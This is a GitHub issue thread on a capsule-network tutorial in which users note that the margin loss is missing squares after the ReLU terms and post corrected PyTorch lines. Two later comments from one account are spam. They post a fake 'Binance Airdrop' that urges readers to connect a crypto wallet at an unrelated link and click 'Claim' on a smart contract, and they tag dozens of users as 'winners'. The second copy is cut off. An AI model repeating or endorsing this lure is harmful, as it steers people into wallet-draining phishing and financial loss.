### ISSUE TITLE
margin loss wrong

### ISSUE THREAD

**Issue by DanlanChen** [higgsfield/Capsule-Network-Tutorial#1]
Hello, I think your magin loss is wrong, according to the paper, after relu, there is a square you forgot

**Comment by DanlanChen** [comment]
I think it should be 
left = ((F.relu(0.9 - v_c))**2).view(batch_size, -1)
right = ((F.relu(v_c - 0.1))**2).view(batch_size, -1)

**Comment by alexlopezcifuentes** [comment]
I have also noticed that little mistake and reviewing the paper it is clear that there are two missing squares.

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @tharunrai14, @dawksh, @chiefbiiko, @mjohnson518, @tw7613781, @kadenzipfel, @devinjelliot, @kannishk, @Mistrymm7, @1anyway, @docongminh, @bigint, @derreck-landon, @ccyanxyz, @jorgeacortes, @markedconfidential, @LeKarimDerradji, @html5cat, @factotumn, @nzhl, @lyhahahad, @pmuens, @kolyasapphire, @fforbeck, @xu3kev, @khiem20tc, @merklejerk, @didierkrux, @vincentjh33, @2020-io, @sid24rane, @thunderwin, @nasjp, @Mikelle, @vinod259, @ghlhchen, @stisa, @grudazgc, @jaydenwindle, @marekolszewski, @blacepo, @sneg55, @samajammin, @naveenklt, @Meharab, @asynctomatic, @guo-yu, @jylin, @mdtanrikulu, @zarifpour

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @
